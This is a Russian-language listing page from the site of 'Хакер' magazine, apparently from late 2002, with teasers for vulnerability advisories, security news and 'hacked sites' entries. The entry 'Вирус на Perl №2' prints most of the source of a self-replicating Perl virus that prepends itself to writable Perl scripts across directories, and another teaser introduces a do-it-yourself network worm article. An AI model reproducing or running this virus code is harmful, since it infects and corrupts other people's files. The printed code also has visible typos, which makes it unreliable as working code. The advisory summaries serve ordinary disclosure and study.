Множественные уязвимости в Ultimate PHP Board
Ultimate PHP Board - небольшой форум, написанный на PHP.
Межсайтовый скриптинг в SquirrelMail
SquirrelMail - webmail программа для Linux и Unix систем.
Межсайтовый скриптинг в разрешенных тэгах в phpBB2
phpBB - доска объявлений для UNIX и Windows систем.
Межсайтовый скриптинг в phpBB
phpBB - популярная доска объявлений для UNIX и Windows систем. Из-за недостаточной фильтрации ввода пользователя, удаленный …
Взломанные сайты: 09.12.2002
Взломан:
Удаленное переполнение буфера в Cyrus IMAP Server
Cyrus IMAPD - бесплатный, с открытым исходным кодом IMAP демон для LINUX и UNIX систем. Пользователь, подключенный к демону,…
Несколько переполнений буфера в Cyrus Sieve/libSieve
В Sieve библиотеке в Cyrus IMAP сервере обнаружено несколько опасных уязвимостей: Передавая заголовок чрезмерной длин…
DoS и утечка информации в Apache/Tomcat
Jakarta Project создает и поддерживает открытые решения на Java платформе для последующего бесплатного распространения. Tomc…
Уязвимость в Panasonic GD87
Германский сотовый оператор T-Mobile International подтвердил факт наличия уязвимости в программном обеспечении сотового тел…
ISS изменила политику
Internet Security Systems (ISS), организация, занимающаяся поиском уязвимостей в различных продуктах, объявила о смене своей…
Раскрытие информации о точке доступа в Windows XP
Обнаруженная уязвимость позволяет раскрыть список значений SSID, назначенных зарегистрированным точкам доступа и пакеты, заш…
Эксплоит WinSSLMiM
WinSSLMiM - эксплоит, реализующий нападение HTTPS "Man in the Middle". Программа содержит FakeCert, утилиту для со…
Патч для IE 5.5 и 6.0
Выпущена очередная заплата к Internet Explorer 5.5 и 6.0, которая содержит все предыдущие исправления к Internet Explorer и …
DoS против Outlook 2002
При работе с полученными почтовыми сообщениями Outlook обрабатывает информацию, содержащуюся в почтовом заголовке, которая с…
Взломанные сайты: 05.12.2002
Взломан:
Южная Корея атакует Белый Дом
В понедельник группа южнокорейских хакеров предприняла попытку взломать компьютерную сеть Белого дома, стараясь тем сам…
Вирус на Perl №2
В следующем исходнике дано решение данной проблемы: #!/usr/bin/perl # Perl - Get'em'all Virus open(File,$0); @Virus=<File>; @Virus=@Virus[0...46]; close(File); &InfectFile; if ($^0 =~ "MacOS") { chdir('::'); &InfectFile; } else { if (($^O =~ "dos") or ($^O =~ "MSWin32")) { $OldDir = `cd`; chdir('..'); &InfectFile; chdir('C:\'); &SearchUpperDirectorys; chdir($OldDir);} else { $OldDir = `pwd`; chdir("/"); &SearchUpperDirectorys; chdir($OldDir);}} sub InfectFile { foreach $FileName (<*>) { if ((-r $FileName) && (-w $FileName) && (-f $FileName)) { open(File, "$FileName"); @Temp=<File>; close(File); if ((@Temp[1] =~ "Virus") or (@Temp[2] =~ "Virus")) { if ((@Temp[0] =~ "perl") or (@Temp[1] =~ "perl")) { open(File, ">$FileName"); print File @Virus; print File @Temp; close (File); }}}}} sub SearchUpperDirectorys { foreach $Directory (<*>) { if ((-r $Directory) && (-w &Directory ) && (-d $Directory) { chdir ($Directory); &InfectFile; chdir ('..') }}} OK, если мы в системе MacOS, то заражаем лишь низшую директорию
Недостаток в FUS механизме в Windows XP
Microsoft Windows XP содержит особенность, которая называется Fast User Switching (FUS). Эта особенность позволяет нескольки…
Ракрытие информации в SuidPerl
Suidperl - perl интерпретатор для suid perl сценариев, часть пакета perl. Уязвимость, обнаруженная в SuidPerl, позволяет ата…
Обход ограничений зоны безопасности в Internet Explorer 6.0
Сценарий может обратиться к данным других доменов, в том числе и к "Local computer zone", когда назначается стиль текст…
Переполнение буфера в Netscape 4
Реализация Java в Netscape 4 содержит переполнение буфера в методе sun.awt.windows. WDefaultFontCharset. canConvert(). Уязви…
Переполнение буфера в Windows клиенте SSH
Переполнение буфера обнаружено в Windows клиенте SSH. Уязвимость происходит из-за ошибки в URL обработчике в Secure Shell кл…
Переполнение буфера в Samba
Переполнение буфера обнаружено в подпрограмме изменения пароля в Samba. Из-за недостаточной проверки границ пользовательског…
Вирус на Perl
Единственная цель этой статьи - получение дополнительных знаний, которые помогут начинающим программистам (таким как я :-)) в освоении языка Perl. Код, использованный здесь, является достаточно простым для понимания теми, кто уже имеет базисные знания Perl
Слет хакеров в Швеции
DreamHack - это крупнейший всемирный слет (lan-party) хакеров и геймеров. Он проводится в Швеции дважды в год, начиная с 199…
Взломанные сайты: 04.12.02
Взломан:
Изменение SQL запроса в PortailPHP
PortailPHP - популярная система управления содержанием. Уязвимость обнаружена в модуле mod_search, включенном в PortailPHP. …
Межсайтовый скриптинг в YaBB 1 Gold
YaBB - популярная доска объявлений для UNIX и Windows систем. Удаленный атакующий может сконструировать специальную ссылку, …
Несколько переполнений буфера в pServ
pServ - небольшой Web сервер. Пакет pServ содержит несколько переполнений буфера, которые позволяют удаленному атакующему вы…
Переполнение буфера в Sybase xp_freedll
Еще одна функция Sybase годится для выполнения произвольных команд на сервере - xp_freedll. Sybase Adaptive Server хранит эт…
Переполнение буфера в Sybase DBCC CHECKVERIFY
В функции DBCC CHECKVERIFY можно переполнить буфер и выполнить произвольные команды с привилегиями сервера. В качестве парам…
Directory Transversal в pWins
В pWins (web-сервер на Perl) существует возможность обхода корневой директории.
Червь своими руками
Сегодня я опишу тебе принцип работы сетевого вируса. Тема, как ты понял, весьма актуальная, поскольку 70% лично моего ящика всегда бывает забита вирусами самого разного пошиба - от мелких, но злобных VBS-червей до полуторамеговых произведений младших школьников :) Они-то ведь не знают про существование WinAPI :)
Беспрецедентное нападение на UltraDNS
Неизвестные злоумышленники предприняли распределенную DoS-атаку на крупного провайдера службы управления доменными именами. …
Возможность DNS имитации в BIND
CAIS/RNP (Brazilian Research Network CSIRT) и Vagner Sacramento от DIMAp/UFRN (Отдел Информатики и Прикладной математики Фед…
DoS против ScreenOS
Уязвимость, обнаруженная в механизме обработки управляющий сеансов H.323, позволяет исчерпать все доступные входы в таблице …
Межсайтовый скриптинг в cFreeProxy
cFreeProxy (a.k.a. " acFP") - HTTP/1.x кэширующий прокси сервер для Microsoft Windows. Обнаруженная уязвимость позволяет ата…
Удаленное переполнение буфера в Sun Microsystems Solaris
fs.auto - реализация "X Window Font Service" для Sun Solaris. XFS протокол предназначен для совместного использования ш…
Межсайтовый скриптинг в XOOPS Quiz Module
Xoops - свободно доступное программное обеспечение для создания Web порталов, написанное в PHP для Unix+MySQL. Уязвимость в …
Взломанные сайты: 27.11.2002
Взломан:
«ХАКЕР» ДОСТУПЕН ТОЛЬКО В ЭЛЕКТРОННОЙ ВЕРСИИ
Оформи подписку — получи:
- доступ к платным материалам сайта
- доступ ко всем номерам PDF
4000 р.
на год
на год
920 р.
на месяц
на месяц
Материалы для подписчиков
Трюки
Вопросы по материалам и подписке: support@glc.ru
Отдел рекламы и спецпроектов: yakovleva.a@glc.ru
Контент 18+
Сайт защищен Qrator —
самой забойной защитой от DDoS в мире
Отдел рекламы и спецпроектов: yakovleva.a@glc.ru
Контент 18+
Сайт защищен Qrator —самой забойной защитой от DDoS в мире